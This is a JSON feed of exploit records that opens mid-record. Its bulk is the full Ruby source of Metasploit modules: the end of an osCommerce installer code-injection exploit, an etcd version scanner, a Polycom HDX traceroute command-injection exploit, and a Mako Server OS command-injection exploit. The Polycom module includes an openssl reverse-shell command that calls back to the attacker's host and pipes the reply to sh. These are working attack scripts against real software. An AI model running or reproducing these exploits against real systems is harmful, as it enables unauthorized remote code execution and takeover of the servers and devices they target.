end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], 'install.php'),\n 'method' => 'GET'\n })\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n unless res.code == 200 && res.body.include?('osCommerce Website')\n return CheckCode::Safe\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], 'index.php'),\n 'method' => 'GET'\n })\n\n if res.body.include?('configure.php') && res.body.include?('The following files need to have their file permissions set to world-writeable (chmod 777):')\n vprint_error 'configure.php is not writable'\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def trigger\n send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], 'includes/configure.php'),\n 'method' => 'GET'\n })\n end\n\n def exploit\n unless check == CheckCode::Appears\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n data = {\n 'DIR_FS_DOCUMENT_ROOT' => './',\n 'DB_DATABASE' => \"');#{payload.encoded}/*\"\n }\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], 'install.php'),\n 'method' => 'POST',\n 'vars_get' => {\n 'step' => '4'\n },\n 'vars_post' => data\n })\n trigger\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb"}, {"lastseen": "2019-11-21T22:51:00", "bulletinFamily": "exploit", "description": "This module connections to etcd API endpoints, typically on 2379/TCP, and attempts to obtain the version of etcd.\n", "modified": "2018-04-04T18:01:38", "published": "2018-04-04T17:54:20", "id": "MSF:AUXILIARY/SCANNER/ETCD/VERSION", "href": "", "type": "metasploit", "title": "Etcd Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Etcd\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Etcd Version Scanner',\n 'Description' => %q(\n This module connections to etcd API endpoints, typically on 2379/TCP, and attempts\n to obtain the version of etcd.\n ),\n 'References' => [\n ['URL', 'https://elweb.co/the-security-footgun-in-etcd']\n ],\n 'Author' => [\n 'Giovanni Collazo <hello@gcollazo.com>', # discovery\n 'Jon Hart <jon_hart@rapid7.com>' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Mar 16 2018\"\n )\n end\n\n def run_host(_target_host)\n if (banner = fingerprint_service(target_uri.to_s))\n print_good(\"#{peer}: #{banner}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/etcd/version.rb"}, {"lastseen": "2019-11-27T08:37:47", "bulletinFamily": "exploit", "description": "Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl.\n", "modified": "2017-12-04T18:47:40", "published": "2017-11-15T15:40:57", "id": "MSF:EXPLOIT/UNIX/MISC/POLYCOM_HDX_TRACEROUTE_EXEC", "href": "", "type": "metasploit", "title": "Polycom Shell HDX Series Traceroute Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution',\n 'Description' => %q{\n Within Polycom command shell, a command execution flaw exists in\n lan traceroute, one of the dev commands, which allows for an\n attacker to execute arbitrary payloads with telnet or openssl.\n },\n 'Author' => [\n 'Mumbai', #\n 'staaldraad', # https://twitter.com/_staaldraad/\n 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass\n 'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them\n ],\n 'References' => [\n ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']\n ],\n 'DisclosureDate' => 'Nov 12 2017',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [[ 'Automatic', {} ]],\n 'Payload' => {\n 'Space' => 8000,\n 'DisableNops' => true,\n 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'}\n },\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(23),\n OptString.new('PASSWORD', [ false, \"Password to access console interface if required.\"]),\n OptAddress.new('CBHOST', [ false, \"The listener address used for staging the final payload\" ]),\n OptPort.new('CBPORT', [ false, \"The listener port used for staging the final payload\" ])\n ])\n end\n\n def check\n connect\n Rex.sleep(1)\n res = sock.get_once\n disconnect\n if !res && !res.empty?\n return Exploit::CheckCode::Unknown\n elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/\n return Exploit::CheckCode::Detected\n end\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to connect to target service\")\n end\n\n #\n # Obtain banner information\n #\n sock = connect\n Rex.sleep(2)\n banner = sock.get_once\n vprint_status(\"Received #{banner.length} bytes from service\")\n vprint_line(\"#{banner}\")\n if banner =~ /password/i\n print_status(\"Authentication enabled on device, authenticating with target...\")\n if datastore['PASSWORD'].nil?\n print_error(\"#{peer} - Please supply a password to authenticate with\")\n return\n end\n # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.\n sock.put(\"#{datastore['PASSWORD']}\\n\")\n res = sock.get_once\n if res =~ /Polycom/\n print_good(\"#{peer} - Authenticated successfully with target.\")\n elsif res =~ /failed/\n print_error(\"#{peer} - Invalid credentials for target.\")\n return\n end\n elsif banner =~ /Polycom/ # praise jesus\n print_good(\"#{peer} - Device has no authentication, excellent!\")\n end\n do_payload(sock)\n end\n\n def do_payload(sock)\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener(true)\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n cmd = \"devcmds\\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\\n\"\n sock.put(cmd)\n if datastore['VERBOSE']\n Rex.sleep(2)\n resp = sock.get_once\n vprint_status(\"Received #{resp.length} bytes in response\")\n vprint_line(resp)\n end\n\n # Give time for our command to be queued and executed\n 1.upto(5) do\n Rex.sleep(1)\n break if session_created?\n end\n end\n\n def stage_final_payload(cli)\n print_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\n cli.put(payload.encoded + \"\\n\")\n end\n\n def start_listener(ssl = false)\n comm = datastore['ListenerComm']\n if comm == 'local'\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n self.service = Rex::Socket::TcpServer.create(\n 'LocalPort' => datastore['CBPORT'],\n 'SSL' => ssl,\n 'SSLCert' => datastore['SSLCert'],\n 'Comm' => comm,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n }\n )\n\n self.service.on_client_connect_proc = proc { |client|\n stage_final_payload(client)\n }\n\n # Start the listening service\n self.service.start\n end\n\n # Shut down any running services\n def cleanup\n super\n if self.service\n print_status(\"Shutting down payload stager listener...\")\n begin\n self.service.deref if self.service.is_a?(Rex::Service)\n if self.service.is_a?(Rex::Socket)\n self.service.close\n self.service.stop\n end\n self.service = nil\n rescue ::Exception\n end\n end\n end\n\n # Accessor for our TCP payload stager\n attr_accessor :service\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb"}, {"lastseen": "2019-12-04T08:51:36", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Mako Server v2.5, 2.6. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.\n", "modified": "2017-11-15T21:00:47", "published": "2017-11-10T21:28:39", "id": "MSF:EXPLOIT/MULTI/HTTP/MAKOSERVER_CMD_EXEC", "href": "", "type": "metasploit", "title": "Mako Server v2.5, 2.6 OS Command Injection RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mako Server v2.5, 2.6 OS Command Injection RCE',\n 'Description' => %q{\n This module exploits a vulnerability found in Mako Server v2.5, 2.6.\n It's possible to inject arbitrary OS commands in the Mako Server\n tutorial page through a PUT request to save.lsp.\n\n Attacker input will be saved on the victims machine and can\n be executed by sending a GET request to manage.lsp.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC\n 'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '42683'],\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']\n ],\n 'Arch' => ARCH_CMD,\n 'Platform' => %w[win unix],\n 'Targets' =>\n [\n ['Mako Server v2.5, 2.6', {}]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Sep 3 2017'))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/'])\n ]\n )\n end\n\n def check\n vprint_status('Trying to detect running Mako Server and necessary files...')\n\n # Send GET request to determine existence of save.lsp page\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp')\n }, 20)\n\n # If response does not include \"MakoServer.net\", target is not viable.\n if res.headers['Server'] !~ /MakoServer\\.net/\n vprint_warning('Target is not a Mako Server.')\n return CheckCode::Safe\n end\n\n if res.body\n if res.body.include?('Incorrect usage')\n # We are able to determine that the server has a save.lsp page and\n # returns the correct output.\n vprint_status('Mako Server save.lsp returns correct ouput.')\n return CheckCode::Appears\n else\n # The page exists, but is not returning the expected output.\n # May be a different version?\n vprint_warning('Mako Server save.lsp did not return expected output.')\n return CheckCode::Detected\n end\n else\n # The above checks failed and exploitability could not be determined.\n vprint_error('Unable to determine exploitability, save.lsp not found.')\n return CheckCode::Unknown\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status('Sending payload to target...')\n\n # The double square brackets helps to ensure single/double quotes\n # in cmd payload do not interfere with syntax of os.execute Lua function.\n cmd = %{os.execute([[#{payload.encoded}]])}\n\n # If users want to troubleshoot their cmd payloads, they can see the\n # Lua function with params that the module uses in a more verbose mode.\n vprint_status(\"Now executing the following command: #{cmd}\")\n\n # Send a PUT request to save.lsp with command payload\n begin\n vprint_status('Sending PUT request to save.lsp...')\n send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'),\n 'ctype' => 'text/plain',\n 'data' => cmd,\n 'vars_get' => {\n 'ex' => '2.1'\n }\n }, 20)\n rescue StandardError => e\n fail_with(Failure::NoAccess, \"Error: #{e}\")\n end\n\n # Send a GET request to manage.lsp with execute set to true\n begin\n vprint_status('Sending GET request to manage.lsp...')\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'examples/manage.lsp'),\n 'vars_get' => {\n 'execute' => 'true',\n 'ex' => '2.1',\n 'type' => 'lua'\n }\n }, 20)\n rescue StandardError => e\n fail_with(Failure::NoAccess, \"Error: #{e}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/makoserver_cmd_exec.rb"}]}
